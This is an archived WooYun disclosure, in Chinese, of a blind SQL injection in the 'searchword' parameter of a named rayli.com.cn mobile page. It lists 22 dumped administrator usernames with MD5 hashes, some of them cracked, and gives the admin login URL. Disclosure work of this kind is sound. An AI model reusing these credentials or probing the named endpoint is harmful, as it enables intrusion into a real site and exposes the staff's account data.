当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-088734

漏洞标题:瑞丽网某子站SQL注入(已获得敏感信息进入后台)

相关厂商:rayli.com.cn

漏洞作者: 0x_Jin

提交时间:2014-12-28 23:15

修复时间:2015-01-02 23:16

公开时间:2015-01-02 23:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-28: 细节已通知厂商并且等待厂商处理中
2015-01-02: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

其实我不止会xss。。。。。。

详细说明:

一日偶然发现的,问题如下:
url : http://m.rayli.com.cn/article/video_search_test.php?page=&page=1&searchword=1&ver=iphone
存在注入的参数 searchword 注入类型布尔盲注 未作任何过滤

QQ20141226-1.jpg


QQ20141226-2.jpg


注入出的管理员数据
Database: wap_correct
Table: wap_user
[22 entries]
username userpass
admin 5ed7f9cd54cc0c1f9e56bf983e78e4c9
anjing d64333e00f0d04c8f5c802afbafbc301
bingbing bf509cfe24c3c2c965506b08920e967a
chenping ee372865c479107abdbf8e5d6f369414
dazhi 115ba86f42b3a83f7ac28fc5729c4939
editor e10adc3949ba59abbe56e057f20f883e (123456)
gaolihua 99cb0ea4276da3d713976809af29dfe5
gaoyuan ef113d8c4bf122875995e4a05d22263c
helinlin fe7bb7ddc65eef2682a57070c5d54129
jianzhi 2c6e80fe7b41a30538629c73b6d5be74
jianzhiwei 2c6e80fe7b41a30538629c73b6d5be74
junzi 14814040f5ff9b68af27d6ac25b5cde5
kangwei d2d1fae9f4f24f5031ff2191dc7b56de
lihuagao 99cb0ea4276da3d713976809af29dfe5
linlin 0edf86bc34856034fcfddc735ad86b02
liufang 56b6798d6b9ffdcd66ef72ae1d4b9e15
scftest f379eaf3c831b04de153469d1bec345e (666666)
songchuans a1c3c2244f87c8b7ee91a8f3faef6691
test 05a671c66aefea124cc08b76ea6d30bb (testtest)
xujia a7a1739a7d0e9746b7c03c0dd6d617e0
yangyang 377b5d8e9e90c5e3998e12402a107c68
zhuzhu 3ea96607cf1c57a9aa8d93736fce63c7
后台地址也特别简单 就是manage.php
http://m.rayli.com.cn/manage.php

QQ20141226-3.jpg


漏洞证明:

QQ20141226-1.jpg


QQ20141226-2.jpg


QQ20141226-3.jpg

修复方案:

做过滤吧~

版权声明:转载请注明来源 0x_Jin@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-01-02 23:16

厂商回复:

最新状态:

暂无